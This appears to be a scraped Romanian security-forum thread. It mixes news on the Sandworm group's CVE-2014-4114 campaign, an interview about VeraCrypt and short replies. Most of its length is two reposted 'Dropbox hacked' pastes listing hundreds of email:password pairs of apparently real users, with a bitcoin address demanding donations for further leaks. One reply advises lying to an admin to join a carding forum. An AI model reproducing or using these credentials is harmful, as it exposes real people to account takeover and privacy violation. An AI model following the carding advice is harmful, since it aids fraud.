Nytro

Microsoft Windows Zero-Day Vulnerability "CVE-2014-4114" Used to Hack NATO Once again a Russian cyber espionage group has gained media attention by exploiting a Zero-day vulnerability in Microsoft’s Windows operating system to spy on the North Atlantic Treaty Organization (NATO), Ukrainian and Polish government agencies, and a variety of sensitive European industries over the last year. ZERO-DAY VULNERABILITY IN MICROSOFT WINDOWS Researchers at cyber intelligence firm iSight Partners have discovered a zero-day vulnerability that impacts desktop and server versions of Windows, from Vista and Server 2008 to current versions. They also uncovered a latest cyber-spying campaign - suspected to be based in Russia - that uses this Zero-day vulnerability (CVE-2014-4114) to target government leaders and institutions for nearly five years. The recently detected Russian hacking group is dubbed as "Sandworm Team" by iSIGHT Partners because it found references to the Frank Herbert's "Dune" science fiction series in the malicious software code used by the Russian hackers. THE NOTORIOUS ZERO-DAY The zero-day vulnerability is "An exposed dangerous method vulnerability exists in the OLE package manager in Microsoft Windows and Server" that "allows an attacker to remotely execute arbitrary code," according to the report. "The vulnerability exists because Windows allows the OLE packager (packager .dll) to download and execute INF files," iSight Partners writes. "In the case of the observed exploit, specifically when handling Microsoft PowerPoint files, the packagers allows a Package OLE object to reference arbitrary external files, such as INF files, from untrusted sources. This will cause the referenced files to be downloaded in the case of INF files, to be executed with specific commands." The Russian hacking group is probably working for the government and has been active since at least 2009 and, according to iSight Partners, the cyber espionage campaign is still ongoing. The intelligence firm began monitoring the hackers’ activity in late 2013 and discovered the zero-day vulnerability in late August. It "discovered a spear-phishing campaign targeting the Ukrainian government and at least one United States organization" during the NATO summit in Wales, where member states discussed Russia’s actions in Ukraine. "On September 3rd, our research and labs teams discovered that the spear-phishing attacks relied on the exploitation of a zero-day vulnerability impacting all supported versions of Microsoft Windows (XP is not impacted) and Windows Server 2008 and 2012," iSight writes. "A weaponized PowerPoint document was observed in these attacks. Though we have not observed details on what data was exfiltrated in this campaign, the use of this zero-day vulnerability virtually guarantees that all of those entities targeted fell victim to some degree." MICROSOFT TO RELEASE PATCH SOON The threat intelligence firm said it reported the critical zero-day vulnerability to the Microsoft Corp. and held off on disclosing the problem so that the software maker had time to fix the flaw. Microsoft plans to release a patch for the vulnerability on Tuesday patch in security bulletin MS14-060, as part of its monthly “Patch Tuesday” — an organized release of patches to vulnerabilities in the company’s software. A Microsoft spokesman said the company plans to roll out an automatic update to the affected versions. Sursa: Microsoft Windows Zero-Day Vulnerability "CVE-2014-4114" Used to Hack NATO

[h=1]Russian hackers target NATO, Ukraine and others: iSight[/h] By Jim Finkle BOSTON Tue Oct 14, 2014 12:05am EDT (Reuters) - Russian hackers exploited a bug in Microsoft Windows and other software to spy on computers used by NATO, the European Union, Ukraine and companies in the energy and telecommunications sectors, according to cyber intelligence firm iSight Partners. ISight said it did not know what data had been found by the hackers, though it suspected they were seeking information on the Ukraine crisis, as well as diplomatic, energy and telecom issues, based on the targets and the contents of phishing emails used to infect computers with tainted files. The five-year cyber espionage campaign is still going on, according to iSight, which dubbed the operation "Sandworm Team" because it found references to the "Dune" science fiction series in the software code used by the hackers. The operation used a variety of ways to attack the targets over the years, iSight said, adding that the hackers began only in August to exploit a vulnerability found in most versions of Windows. ISight said it told Microsoft Corp about the bug and held off on disclosing the problem so the software maker had time to fix it. A Microsoft spokesman said the company plans to roll out an automatic update to affected versions of Windows on Tuesday. There was no immediate comment from the Russian government, NATO, the EU or the Ukraine government. Researchers with Dallas-based iSight said they believed the hackers are Russian because of language clues in the software code and because of their choice of targets. "Your targets almost certainly have to do with your interests. We see strong ties to Russian origins here," said John Hulquist, head of iSight's cyber espionage practice. The firm plans to release a 16-page report on Sandworm Team to its clients on Tuesday. While technical indicators do not indicate whether the hackers have ties to the Russian government, Hulquist said he believed they were supported by a nation state because they were engaging in espionage, not cyber crime. For example, in December 2013, NATO was targeted with a malicious document on European diplomacy. Several regional governments in the Ukraine and an academic working on Russian issues in the United States were sent tainted emails that claimed to contain a list of pro-Russian extremist activities, according to iSight. The firm said its researchers uncovered evidence that some Ukrainian government computer systems were infected, but they were unable to remotely confirm specific victims among those systems that had been targeted. Still, researchers believe a large percentage of those targeted systems were infected because the malicious software used was very sophisticated, using a previously unknown attack method that enabled it to get past virtually all known security protections, said Drew Robinson, a senior technical analyst with iSight Partners. ISight said it had alerted some victims of Sandworm Team, but declined to elaborate. The iSight research is the latest in a series of private sector security reports that link Moscow to some of the most sophisticated cyber espionage uncovered to date. Russia's Kaspersky Lab in August released details on a campaign that attacked two spy agencies and hundreds of government and military targets across Europe and the Middle East. (Reporting by Jim Finkle; Additional reporting by Alastair Macdonald; Editing by Tiffany Wu) Sursa: Russian hackers target NATO, Ukraine and others: iSight | Reuters Altele: Russian 'Sandworm' Hack Has Been Spying on Foreign Governments for Years | WIRED

Dropbox Hack Second Teaser. As promised here is another batch of Hacked Dropbox accounts from close to 7 million total hacked accounts. We will keep releasing more to the public as donations come in, show your support. Send bitcoin donations to 1Fw7QqUgzbns7yWHH32UnmMxmMMwu6MC6h Enjoy! More to come. As previously, all Dropbox logins are in the same format, login:Password Bille97@hotmail.com:billebille Billelsaddi@hotmail.com:270189 Billenann@hotmail.com:heyhey Billetes_cachanilla@hotmail.com:billetes Billewanchuk@shaw.ca:carebear Billflana@yahoo.com:7612bf Billfulk@hotmail.com:6970bf Billglez@yahoo.com:chicos Billgrandy@hotmail.com:hall04 Billibelle@hotmail.com:ocareh Billiboy17@hotmail.com:jordan23 Billy_j_7@hotmail.com:b1i9l7l3y Billykaelin@hotmail.com:billy73 Bilo23@yahoo.es:bilo78 Bimes91@yahoo.com:jesusis Bimsmendoza@yahoo.com:tenement Bin1651@hotmail.com:16513219 Bingo983@hotmail.com:goldie Binjamin24@aol.com:walter1214 Bintangvenus@yahoo.com:140960 Biohazz@hotmail.com:tjgm151284 Biolina@hotmail.com:faby8481 Biowizard@gmail.com:123abc Birdman_1984@yahoo.com:045343 birdman8704@hotmail.com:simtekonnen Birgit.bruylandt@arteveldehs.be:rob260600 Birgit.frankenberg@verizon.net:$aries78 Birgit.hamrich@gmx.net:syrxhacht Birmad@msn.com:mushtaaq Birziete@hotmail.com:stica3 Bisfish@gmail.com:guitar76 Bissonchris@hotmail.com:ricards Bissyjanuplatho@yahoo.com:255043 Bitofr2001@yahoo.fr:jardiland Bixente55@hotmail.com:lizarazu bixkuitero@hotmail.com:paputxio bj_predator_0919@yahoo.com:Angeluz Bj_witkowski@hotmail.com:13056956 Bjawesterman@yahoo.co.uk:oombart bjornullstrom@hotmail.com:weecweec Bjpeters02@gmail.com:hatsbears Bkavin@earthlink.net:huxley17 Bkchow81@hotmail.com:2885031 Bkocagil@yahoo.ca:psygno Bkrs505@aol.com:daisy1 Blabeybaby@yahoo.com:23papa23 Black_stone03@hotmail.com:2878256 Blackboy_di@hotmail.com:farnshu Blackchain_1@hotmail.com:sl1pkn0t Blackjack0512@hotmail.com:1417170513 blackkid1983@yahoo.com:maggie Blacklemon88@hotmail.com:coolkid blackmasta@gmail.com:moomoo blackmessa@msn.com:dhtvirus Blackmin@hotmail.com:cortina Blackmisuper2@yahoo.com.hk:ascszh5m Blackmon41@aol.com:dizzy41 blacknigi@yahoo.com:mercury Blackninj@hotmail.com:john0000 Blackninja_tj@hotmail.com:75167516 Blackninjarat@hotmail.com:thailand blacknite_tk@hotmail.com:psalms23 Blacknova81@aol.com:virgo81 blacknsilver337@msn.com:a250racer Blackout2@shaw.ca:mantra Blackoutproduct@yahoo.com:dxsuckit blackpearlcandy@hotmail.com:christmas Blackpink_ganaa@yahoo.com:kj911111 Blackpit@ish.de:DB2000 Blackpool3@aol.com:spiegel Blackporsche82@yahoo.com:gsxr1100 blackpower007@hotmail.com:4142black Blackprinceatfvsu@yahoo.com:cascade Blackprincerich@hotmail.co.uk:wedding74 blackprincess_972@msn.com:080289 Blackproductionsent@yahoo.com:mr.black Blackragnarok@hotmail.com:062408 Blackraven15@yahoo.com:ironroof71 Blacks9885@yahoo.com:642590 Blacksandrine@hotmail.com:paperbooks Blackshuck_84@hotmail.com:loveisonlyafeeling Blacksmhong@hotmail.com:justain1 Blackspiderent@yahoo.com:biglifes Blackstar189@hotmail.com:afrika Blackstar58_8@hotmail.com:jazmin Blackstarfallen@hotmail.com:smoochies Blacksteele2002@yahoo.com:sandman Blackstone_241@hotmail.com:hotmail Blackstyle99@gmail.com:Ardfac1! Blacktone234@yahoo.com:uhyeah Blacktowergirl@hotmail.co.uk:munchies Blacktrognon94@msn.com:tapasima Blackwater_2k@yahoo.com:786786 Blackwel@etsu.edu:bearclaw Blacky1981@aol.com:hershey Blackzeal101@yahoo.com:ojay231 Bladdersplatter@gmail.com:shadow1982 Bladdy_007@hotmail.com:014252426 blade_ryka@hotmail.com:boat90 Bladefast@gmail.com:mama3ayno Via: DROPBOX.COM Hacked Second Teaser - Pastebin.com Altele: http://pastebin.com/NtgwpfVm Altele: http://pastebin.com/CsN3SrGA

***** DROPBOX HACKED ***** 6,937,081 DROPBOX ACCOUNTS HACKED PHOTOS - VIDEOS - OTHER FILES MORE BITCOIN = MORE ACCOUNTS PUBLISHED ON PASTEBIN As more BTC is donated , More pastebin pastes will appear To find them, simply search for "DROPBOX HACKED" and you will see any additional pastes as they are published. FIRST TEASER - 400 DROPBOX ACCOUNTS Just to get things going... SEND BTC DONATIONS TO 1Fw7QqUgzbns7yWHH32UnmMxmMMwu6MC6h COME BACK AND CHECK PASTEBIN FOR NEW DROPBOX DROPS THE MORE BTC DONATED WILL REFLECT HOW MANY MORE LOGIN AND PASSWORDS ARE RELEASED PUBLIC. START OF DROPBOX HACKED ACCOUNT LOGIN AND PASSWORDS Benitacran@btinternet.com:choochoo123 benitaokagbue@hotmail.com:87onaedo Benitesleo@hotmail.com:19761976 Benitez.paulina@gmail.com:buenitez Benitez_ja@hotmail.com:juan4848 Benitez11@hotmail.com:cienypop Benitez7288@hotmail.com:05311984 Beniteznadia@yahoo.com:what1212 Benitezotefuites@hotmail.com:alejandra Benitezrulez@hotmail.com:15412872 benito_mendes@yahoo.com:junior33 Benito2000@hotmail.com:rastapodja Benito214@hotmail.com:putavida Benitoarturo@hotmail.com:250185 Benitocortes@hotmail.com:tigres Benitomtz@hotmail.com:bmg0530 Benitoprosper@hotmail.com:001971 benitopuga@hotmail.com:3564472 Benitorsc@hotmail.com:21282128 Benitotrento@hotmail.com:1985bltr Benitto@prodigy.net.mx:durcka Benitza27@hotmail.com:lucero13 Beniville@yahoo.co.uk:france Benj_mousquet@hotmail.com:060982 Benja_2020@hotmail.com:thebest4 Benja_2307@hotmail.com:benjaminlls Benja_camos91@hotmail.com:6071991 Benja_camus@hotmail.com:ergosum Benja1982@hotmail.com:xr3y20 Benjaboonchar@hotmail.com:bugoff Benjackson666@hotmail.com:otford666 benjalinares@hotmail.com:cuca1983 Benjames171@hotmail.com:scoopex Benjamim.82@gmail.com:erptlxb Benjamim_ramos@hotmail.com:fisicadez Benjamin.blakely@gmail.com:kamikaze Benjamin.foissey@wanadoo.fr:simbamartin Benjamin.jensen@gmail.com:74459597 Benjamin.koon@gmail.com:funkadelic Benjamin.lasserre@free.fr:ben0780 Benjamin.moll@gmail.com:bmNW8ORE Benjamin.osborne@gmail.com:osborne42 Benjamin.saur@hotmail.com:spanien Benjamin.vignot@gmail.com:13241324 Benjamin.wood@gartner.com:brw98001 Benjamin@italiaander.org:labouroflove benjamin@octa4.net.au:Helen67 Benjamin@resolvefilms.com:woodson Benjamin@schlechter.net:deneke17 Benjamin@uyttebroeck.net:ikbedoel Benjamin_5566@hotmail.com:236789 Benjamin_abtan@yahoo.fr:israel Benjamin_bisschops@hotmail.com:polleken Benjamin_bunting@hotmail.com:guitar Benjamin_cheng_yong@yahoo.com.sg:280679 benjamin_cornu@hotmail.com:05041979 benjamin_james_harrison@yahoo.co.uk:2bornot2b Benjamin_keane@hotmail.com:presice55 Benjamin_kek@hotmail.com:b3nk3k Benjamin_kkc@hotmail.com:benkhoo1 Benjamin_m@metrixlab.com.mx:bemen9 Benjamin_monroe1@yahoo.com:sithspawn Benjamin_nielsen@hotmail.com:den1560 Benjamin_niemczyk@hotmail.com:Benji1999 Benjamin_ordonez@hotmail.com:59800599 Benjamin_parry@yahoo.com.au:476530 benjamin_pasquier@hotmail.com:romulus benjamin_plw@yahoo.com:301272 Benjamin_pop@hotmail.com:pumpkins benjamin_preacher@yahoo.com:frankl1n Benjamin_quicq@hotmail.com:cesar22 Benjamin_song@hotmail.com:8814137e benjamin_tan86@hotmail.com:99041ben benjamin_vanlaere@hotmail.com:14everything Benjamin_whitehead@yahoo.com:nwanda Benjamin2292@hotmail.com:be2292 Benjamin2606@hotmail.com:26061983 Benjamin2625@hotmail.com:26910441 Benjamin988@hotmail.com:ke4g5v Benjaminarnaud@hotmail.com:mercedes Benjaminaznar@hotmail.com:00047950 Benjaminbarros@gmail.com:bb7335 Benjaminbayard@hotmail.com:451100 Benjaminbuttier@hotmail.com:visavisa Benjaminchandler@gmail.com:merkurydrop Benjamincody@yahoo.com:86753099 Benjamincompton@hotmail.com:notthatbad Benjamincwh123@hotmail.com:xdhhnvi Benjamindonati@hotmail.com:andycole Benjamine_89@hotmail.com:kanontw Benjaminemmanuelsmith@hotmail.com:vedder Benjaminferguson@hotmail.com:felix123 Benjamingaunt@hotmail.com:cabria757 Benjaminguillen86@hotmail.com:baterya benjaminhui@hotmail.com:mj2323 Benjaminjais@hotmail.com:ttnouvo Benjaminkheng@hotmail.com:lovediary benjaminlujan@yahoo.com:omarin79 Benjaminman7@hotmail.com:senisevi Benjaminmccarthy@hotmail.com:holdenEH Benjaminmyoung@hotmail.com:wertre Benjaminplouvier555@hotmail.com:indiana Benjaminpquest@yahoo.com:ques120475t Benjaminroccomammola@hotmail.com:quovadis benjaminroger@yahoo.com:rogbenjiifj Benjamins101@yahoo.com:Benjam!ns101 Benjaminsean@hotmail.com:burton Benjamintanjb@hotmail.com:bentjb Benjamintarraf@hotmail.com:BenTarkan83 Benjaminvdw@yahoo.com:bibi994x Benjaminvisser@hotmail.com:arend-jan Benjaminvonmatt@hotmail.com:satan81 Benjaminw6633@hotmail.com:elderman Benjaminwauman@hotmail.com:swasentnuf benjamin-winter@gmxpro.de:Knopex3553 Benjaminzhou@yeah.net:62573342 Benjaminzvidzai@yahoo.co.uk:gracez Benjammin95@hotmail.com:helicopter Benjamonjuarez@msn.com:benjamon Benjapintoe@hotmail.com:teoteo Benjapol29@hotmail.com:2937527 Benjcanfield@yahoo.com:cizzle Benjebola@hotmail.com:clue4184 Benjellounsimo@hotmail.com:hercule Benji_192@hotmail.com:checkm8te Benji_chai@hotmail.com:asshole Benjicheah@hotmail.com:benjic Benjieaclan@yahoo.com:benjie benjin12480@hotmail.com:iobe1710 Benjitawx@hotmail.com:benjalminha Benjitenerife@hotmail.com:100682 Benjnielsen@hotmail.com:single benjrouse@hotmail.com:woodson Benjsoares@hotmail.com:0055500 Benjy_morgan@hotmail.com:dongding Benjy_zgr8@hotmail.com:noknok Benjy172002@hotmail.com:socceroos Benke.huygaerts@gmail.com:bhdfq770 Benkendall@hotmail.com:benjamin Benkeny2003@hotmail.com:bk6859 Benkham00@hotmail.com:8329100a Benkoh228@hotmail.com:master12 Benkolls@hotmail.com:Dungeon benkrecke@hotmail.com:iamthedude Benkurrein@hotmail.com:try203b Benlan2000@hotmail.com:tongres15 Benlessard@hotmail.com:garsdpartys benloh221101@yahoo.com:221101 Benlokumaine@yahoo.fr:135615491a Benmack85@hotmail.com:leahmyers Benmakrelouf@hotmail.com:espoir benmatellini@hotmail.com:matigog926 Benmcgregor131@hotmail.com:yrustupid Benmicolon@hotmail.com:2382935 Benminter@yahoo.co.uk:m111ter Benmodeste@hotmail.com:Modsjnr Bennetsteve@hotmail.com:420harry Bennett.alice@gmail.com:641990 Bennett_paul@hotmail.com:ireland Bennett290@hotmail.com:pppppp Bennettgraham1@yahoo.co.uk:dexter1cat Benni_blanco@hotmail.com:preacher Bennichols01@hotmail.com:bnichols benniehoekstra@hotmail.com:90370724 Bennies_sos@hotmail.com:024393266 Bennun@optonline.net:rb1971 Benny@dataport.no:58igoisp Benny_thomas21@yahoo.co.in:finnis23 Benny_wood@hotmail.com:kirsty42 Bennybabyty@gmail.com:thazhath bennylo77@hotmail.com:bunnylo Bennymoore98@hotmail.com:melbourne bennynsp@hotmail.com:eggegg Bennyschmidt12@yahoo.com:shannon1 Benoit.doumas@gmail.com:tr8un6ne Benoit.moine@gmail.com:falvy228 Benoit.robichaud@umontreal.ca:mazan00 benoitaupecle@hotmail.com:fraisier Benoy13@yahoo.com:berylben Benpierpoint@hotmail.com:sarahmay Benpryke@hotmail.com:mountier Benson_hoo@hotmail.com:williamso Benur.betty@gmail.com:guy5445079 Benvenables@talk21.com:viek3m Benver@gmail.com:tarres Benwesthead140@hotmail.com:17091978 Benwhiffin@hotmail.com:271188 benwong_99@yahoo.com:bennyboy Benzito007@hotmail.com:nigger beong1@hotmail.com:kiekeboe Beont@hotmail.com:zerozero Bepelegri@hotmail.com:tatata Beqoool@hotmail.com:ludipine berardinelli_32@hotmail.com:amigos Berdine_billen@hotmail.com:giraffe Bere_ms06@hotmail.com:271188 Beremunive@yahoo.com:berunfla berendbot@msn.com:botbot Berenicemg_7@msn.com:0096905 Bergquist_pia@hotmail.com:mikemus Berk.alpaslan@gmail.com:fenerbahce berkayaksoy@hotmail.com:ber1917 berkmekik@gmail.com:64176417 Berknopp@yahoo.com.br:fender1584 Berkseval@hotmail.com:34brk86 Bernadettema@gmail.com:zooeii28 Bernadtom@hotmail.com:promo2002 Bernaflip@hotmail.com:449854 Bernal_bb@hotmail.com:skalibur Bernal_maria@hotmail.com:7167red Bernardb@challenge-me.com:leeward Bernardchan74@hotmail.com:bcby2919 Bernardduggan@yahoo.co.uk:batboy1 Bernardoch2@hotmail.com:104243 Bernardstuyven@hotmail.com:pellen82 bernardtts@yahoo.com:62778894 Bernardwheatley@yahoo.com.au:grubster Bernardwieg@hotmail.com:biertje Bernd_de_marrez@hotmail.com:baloncesto Bernd_kolb@hotmail.com:vergessen Bernhard.warr@gmail.com:badjga9! Bernhardrepa@gmx.at:gringoloco Bernie.dzt@free.fr:Csa2aRrS Bernie.kan@gmail.com:19851985 bernie_m2@hotmail.com:dancing berntis@excite.com:ormex318 Berrind2003@yahoo.com:karakoca Berry_oonincx@msn.com:disturbed Berry99@hotmail.com:confident Berryko@hotmail.com:tarantoo Bert0023@hotmail.com:bert46bert Bertderooij@planet.nl:b1958dr berteken@hotmail.com:bert1978 Berthapet@citromail.hu:bertha1 Bertiewonder@hotmail.com:Bertie.1der Bertillybilly@hotmail.com:tweeling Bertlee12@gmail.com:dt12nc Bertozapata@ya.com:918157597 Berzegerol@hotmail.com:berzeg77 Besizh@hotmail.com:velipoja Besmeh@gmail.com:ze2neh Besnistos@yahoo.es:domingo Bessiechen@hotmail.com:610324 Bestank@yahoo.com:plumcouch bestfrank2020@hotmail.com:fbs753 Bet_buxo@yahoo.es:8668417 Betaaa@hotmail.com:beta1221 Betaguerra@hotmail.com:32686527 betalibardi@hotmail.com:libardi betasin@hotmail.com:filler Betgerisrinivas@hotmail.com:byadgi Beth_975@yahoo.com:Roxy0975 Beth_friel@hotmail.com:kyla1111 beth879@hotmail.com:toffee Bethan27@hotmail.com:redwreck Bethanygabriela@hotmail.com:bgll861130 Bethanykipp@hotmail.com:promise Bethdelaney@hotmail.com:unlucky Bethfesarillo@yahoo.com:fuchsia Bethinhasp@hotmail.com:betinha1 Bethmoynahan@yahoo.com:Obi1knobi Betho12345@gmail.com:pinocho Beto_081091@hotmail.com:wather10 Beto_556_kenny@hotmail.com:233256 Beto_garza21@hotmail.com:Beto21rules Beto_santos21@hotmail.com:as1104 Beto2002@hotmail.com:96224030 Beto502@hotmail.com:0226020 Beto8683@hotmail.com:97560911 Betomat14@hotmail.com:slduffash Betoonlinemx@yahoo.com.mx:markxt Betopegler@hotmail.com:corinthians Betowolf@hotmail.com:betobh2 Betsilon82@hotmail.com:27051982 Bettina0104@hotmail.com:schippi Bettinablue50@hotmail.com:bsba5200 Bettinakalt@hotmail.com:bettinak Bettinazuercher@web.de:superstar Bettybirm@hotmail.com:finanzas Bettyboops75@hotmail.com:clic1975 Bettykabbabe@hotmail.com:160864 Betul_zer@hotmail.com:4327916 Betulchem@hotmail.com:5nisan1994 Betulsevcan@mynet.com:bs12356 Beu1986@hotmail.com:isabel Beudy1@hotmail.com:nikita beutenkristof@hotmail.com:djeezes bev68@personainternet.com:acerview Bevgeorgeesq@hotmail.com:theos0925 Bevin.marwa@gmail.com:creative Bewar_sindi@hotmail.com:8210boys Beware87@hotmail.com:puchyy Bexabo@hotmail.com:lollipop Beyikh@hotmail.com:tony2407 Bfbatey@yahoo.com:usafa02 Bfcbeda@yahoo.com.hk:saykenho Bfernandezc4@hotmail.com:060195 Bfernando@gmail.com:tmc123 bffbffbff@hotmail.com:781113 bfkzk@yahoo.com.br:musica bflow_1@msn.com:27892789 Bfoda@yahoo.com:habiba bgaliana@bellsouth.net:pepito Bgarantche@yahoo.fr:tintin1982 Bgaye04@yahoo.com:mase83 bgenkz@yahoo.com:rapidz Bggs15@hotmail.com:converse bghimel@yahoo.com.br:102608 bgjumawan@yahoo.com:bong4529 Bgpepper@xtra.co.nz:max9191 Bgrbkn@hotmail.com:001990 bh_malini@yahoo.co.in:water31 Bhamrick1313@gmail.com:pickle77 Bhan_arnuco@yahoo.com:bharon bhandariamal151@hotmail.com:123456 Bhanu919@yahoo.co.in:prakash Bhanuprathappn@rediffmail.com:kevlar Bharathbabug@gmail.com:orderoflove Bharti.choudhary@gmail.com:ohmygod1 bhaskar_malhotra@yahoo.com:bastard22 Bhaskargr@hotmail.com:anuradha Bhaswarpal@gmail.com:hetfield bhatiasanjeev76@yahoo.com:topatopa Bhavesh.bhathella@gmail.com:goldstar Bhavesh_chandrani@yahoo.com:bhshchra Bhavesh_pabari@yahoo.com:bmpabari bhavikgore@yahoo.com:bhavikgor123 Bhavnababulal@hotmail.com:135peptalk Bhavsusa@yahoo.com:spirit Bhavyabahadur@hotmail.com:forget Bhawesh_dandona@yahoo.co.in:madhu2002 bhawisha@hotmail.com:bhaw1sha Bhebekbloom@hotmail.com:orlando Bheras@hotmail.com:todoen Bhicks200416@sbcglobal.net:mother Bhkimy_7@hotmail.com:beyonce bhofmeister13@gmail.com:room13 Bholowasia@gmail.com:HmanuB11 Bhoneyman@hotmail.com:ev100100 Bhourey@hotmail.com:rashidul bhoy14@hotmail.com:lambert14 Bhs2005@hotmail.com:9540047 Bhtteo@hotmail.com:250677 Bhudia1@hotmail.com:iizdaman Bhuds_dj@yahoo.com:badi113 Bhulse57@hotmail.com:sunny7 Bhundel@yahoo.com:bhundel bhushan_m83@yahoo.com:woodbird Bhushan365@yahoo.com:bhu146715392 Bhushy_j@yahoo.com:ladybird Bhutiadw@yahoo.com:524477 Bhuv.guru@gmail.com:akshay1993 Bhuvneshshah@yahoo.co.in:brshah Bi_bulls@yahoo.com:l23456 Bi1999@hotmail.com:090981 Bia_afonso@hotmail.com:elefante bia_mansberger@hotmail.com:bibizoka Bia_otter@yahoo.com:birgitte82 bia_ros91@hotmail.com:biaros Bia8205@hotmail.com:211189 Bianca@cwpanama.net:diegoandre Bianca_cfp@hotmail.com:031294 Bianca_krist@hotmail.com:zzzzziggy Biancadamme@hotmail.com:bianca biancalana_l@hotmail.com:t4b7w9e2 Biancamkelly@hotmail.com:kelly11 Biancarf@uol.com.br:chanel biareinounido@hotmail.com:220787 Bibbylee@hotmail.com:naebdom Bibi_byrne@hotmail.com:kerijones Bibi_jcc@msn.com:rsuujewj Bibi11225@yahoo.com:dakanounou Bibi132@gmx.de:birgit1960 bibi3243@hotmail.com:verliefd bibianawllee@hotmail.com:hegemone Bibich74@hotmail.com:1741989 Bibie666@hotmail.fr:flipper Bibigo2003@yahoo.co.uk:skyhooks Bibimen@yahoo.com:*ldst3 Bibinantony@gmail.com:fadafad Bibleprophecy_ndbpsa@yahoo.com:patburns Bichobambino@hotmail.com:bichovino Bicus23@hotmail.com:bundudo Bidargaddi@gmail.com:08091401 Bidde_1@hotmail.com:wolfsnagen Bien_patrickbondoc@hotmail.com:00000777 Bierre45@hotmail.com:verres Big_and_bad_786@hotmail.co.uk:allah786 Big_m_style@hotmail.com:colordisk Big_up1996@hotmail.com:030983 bigal0604@hotmail.co.uk:naomianne Bigbadwoulfe@hotmail.com:nicolas Bigblokesean@yahoo.co.uk:tittybong Bigeyes_tor@hotmail.com:oasistor Biggie9925@hotmail.com:biggie biggirlkrista@hotmail.com:trixie Biggluvis@hotmail.com:amkamiko Biggunz0824@aol.com:memnoch2 Biggyskunk@hotmail.com:matrix Bigjoetownsend@hotmail.com:vintage SEND BTC DONATIONS TO 1Fw7QqUgzbns7yWHH32UnmMxmMMwu6MC6h COME BACK AND CHECK PASTEBIN FOR NEW DROPBOX DROPS THE MORE BTC DONATED WILL REFLECT HOW MANY MORE LOGIN AND PASSWORDS ARE RELEASED PUBLIC. Via: DROPBOX.COM HACKED First Teaser - Pastebin.com

Acolo te duci din doua motive: 1. Vinzi: CC-uri, banking trojan sau alte porcarii 2. Cumperi: CC-uri, banking trojan sau alte porcarii Vorbeste cu adminu si zi-i de ce vrei sa intri. Minte-l cu ceva.

A fork of TrueCrypt's code, VeraCrypt strengthens the open source encryption software's transformation process and addresses other weaknesses. By Paul Rubens | Posted October 13, 2014 If you're reluctant to continue using TrueCrypt now that the open source encryption project has been abandoned, and you don't want to wait for the CipherShed fork to mature, one alternative that's well worth investigating is VeraCrypt. VeraCrypt is also a fork of the original TrueCrypt code, and it was launched in June 2013. IT security consultant Mounir Idrassi, who is based in France, runs the project and is its main contributor. Idrassi's motivation for developing VeraCrypt stems back to 2012 when he was asked to integrate TrueCrypt with a client's product. Before doing this he carried out a security audit of the code and discovered some issues. "There were no big problems, no backdoors or anything like that. But there were some small things, so we decided to start VeraCrypt," he said. Idrassi said the main weakness in TrueCrypt was that - in his view - it was not secure against brute force attacks. Specifically, the way the software transformed a password to derive a key was not good enough, he said. "TrueCrypt uses a transformation that is not very complex. It is not sufficient, especially now with cloud cracking systems," he explained. TrueCrypt Weakness In technical terms, when a system partition is encrypted, TrueCrypt uses PBKDF2-RIPEMD160 with 1,000 iterations. For standard containers and other (i.e. non system) partitions, TrueCrypt uses at most 2,000 iterations. What Idrassi did was beef up the transformation process. VeraCrypt uses 327,661 iterations of the PBKDF2-RIPEMD160 algorithm for system partitions, and for standard containers and other partitions it uses 655,331 iterations of RIPEMD160 and 500,000 iterations of SHA-2 and Whirlpool, he said. While this makes VeraCrypt slightly slower at opening encrypted partitions, it makes the software a minimum of 10 and a maximum of about 300 times harder to brute force. "Effectively, something that might take a month to crack with TrueCrypt might take a year with VeraCrypt," Idrassi said. As a result of this change, the VeraCrypt storage format is incompatible with TrueCrypt. While that could be a problem for anyone looking to move from TrueCrypt to VeraCrypt, Idrassi said he is working on a conversion tool which will be available within the next three months. Better than TrueCrypt As well as increasing the number of iterations that are carried out, Idrassi said he has addressed weaknesses in the API and drivers, and in parameter checking. The code has also been run against static analysis tools and changes made to correct defects that the analysis detected. "Our focus has been on security so far, but the next step will be to add new features," Idrassi said, adding that new features will include compatibility with UEFI (to make the software work with Windows 8 and 10, for example) and capabilities for steganography – used to hide information in things like digital image files. An obvious question to ask is whether Idrassi has considered teaming up with the CipherShed project. He said he was contacted by Bill Cox, a member of the CipherShed project management committee, back in June and asked to help, but he is too busy. "I don't have a lot of time but I can certainly contribute patches and things like that," he said. But there are other reasons why Idrassi is reluctant to get involved. "The main issue I have is that we don't agree on one thing: CipherShed think it is OK to continue using the TrueCrypt format (using the smaller number of iterations.) But we don't consider it secure enough - not to provide a high level of security against people or organizations with huge resources," he said. The NSA Effect Idrassi hinted that breaking compatibility with TrueCrypt is a good idea for another reason too. "For more than 10 years, law enforcement agencies have developed an infrastructure and tools to do forensic analysis of TrueCrypt volumes," he said. Changing format and adding complexity is therefore not something that security agencies welcome, which, he suggested, makes it a problem for any U.S. based developers to contribute to VeraCrypt. "If you contribute to a project like this then you will be on a watch list in the U.S. We are based in France, so this is not a problem for us," he said. As a result, VeraCrypt has few contributors apart from Idrassi himself. "This is not a game," he said. "It is very serious and we do it as professionals. We are very clear: The project is public, the French authorities are aware of it. But that's why not a lot of people contribute." No TrueCrypt Conspiracy As for the reason that TrueCrypt was abandoned by its original authors, Idrassi sees no cause for alarm. "I am sure the people involved in TrueCrypt couldn't have stayed anonymous and the security agencies knew who they were," he said. "But when you look at the code, you get the idea that these people must have been in their 40s back in 1995. So now they are in their 60s, and they are probably tired or retired. "When they stopped the project they knew that it would cause new initiatives to start. I certainly don't believe there was anything suspicious,"Idrassi said. Paul Rubens has been covering enterprise technology for over 20 years. In that time he has written for leading UK and international publications including The Economist, The Times, Financial Times, the BBC, Computing and ServerWatch. Sursa: VeraCrypt a Worthy TrueCrypt Alternative - eSecurity Planet

Da, e praf. Exploit-urile aici: https://rstforums.com/forum/exploituri-si-pocs.rst Pentru Tapatalk nu era exploit-ul public, doar advisory-ul.

/admincp/api.php /admincp/apistats.php /admincp/apilog.php Fixed the "1337" way

